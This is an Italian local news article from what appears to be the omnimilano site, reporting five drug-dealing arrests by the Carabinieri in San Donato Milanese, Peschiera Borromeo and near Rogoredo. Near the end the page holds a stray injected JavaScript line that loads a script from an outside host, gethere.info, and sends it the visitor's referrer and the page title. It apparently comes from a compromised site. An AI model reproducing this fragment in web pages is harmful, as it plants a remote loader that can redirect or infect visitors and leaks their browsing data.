"/>
sabato 19 agosto 2017 20:55:19
omnimilano

SAN DONATO, ATTIVITÀ ANTIDROGA DEI CARABINIERI: 5 ARRESTI IN POCHE ORE

4 dicembre 2016 Cronaca

Nella serata di ieri i Carabinieri della Compagnia di San Donato Milanese (MI) in tre distinte operazioni hanno tratto in arresto 5 persone per detenzione e spaccio di stupefacenti.
Nel tardo pomeriggio a Peschiera Borromeo (MI) un militare del Nucleo Radiomobile, libero dal servizio, ha notato un giovane nord africano accostare l’auto al margine della strada che stava percorrendo per effettuare quella che sembrava essere una cessione di stupefacenti. Il militare lo ha seguito fino all’intervento delle gazzelle e di una pattuglia di motociclisti della Polizia Locale di quel Comune. In auto lo spacciatore, un cittadino marocchino 34enne, nascondeva oltre 100 gr di cocaina, già suddivisa in dosi e 500 euro. Arrestato, è stato condotto a San Vittore.
Poco dopo, sempre ad opera del Nucleo Radiomobile, sono finiti in manette due giovani marocchini di 18 e 24 anni trovati in possesso di più di 100 gr di eroina mentre raggiungevano una zona isolata nelle campagne tra Mediglia (MI) e Peschiera Borromeo.
In serata invece nei pressi della stazione di San Donato e nell’area confinante con la stazione di Rogoredo, durante un servizio coordinato di controllo del territorio, sono stati tratti in arresto altri due spacciatori: un 18enne egiziano, sorpreso mentre cedeva alcune dosi di cocaina, ed un italiano 35 enne trovato in possesso di pochi grammi di marijuana, la successiva perquisizione domiciliare ha permesso di rinvenire nella sua disponibilità oltre 800 grammi della medesima sostanza. Entrambi sono finiti a San Vittore.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Condividi questo articolo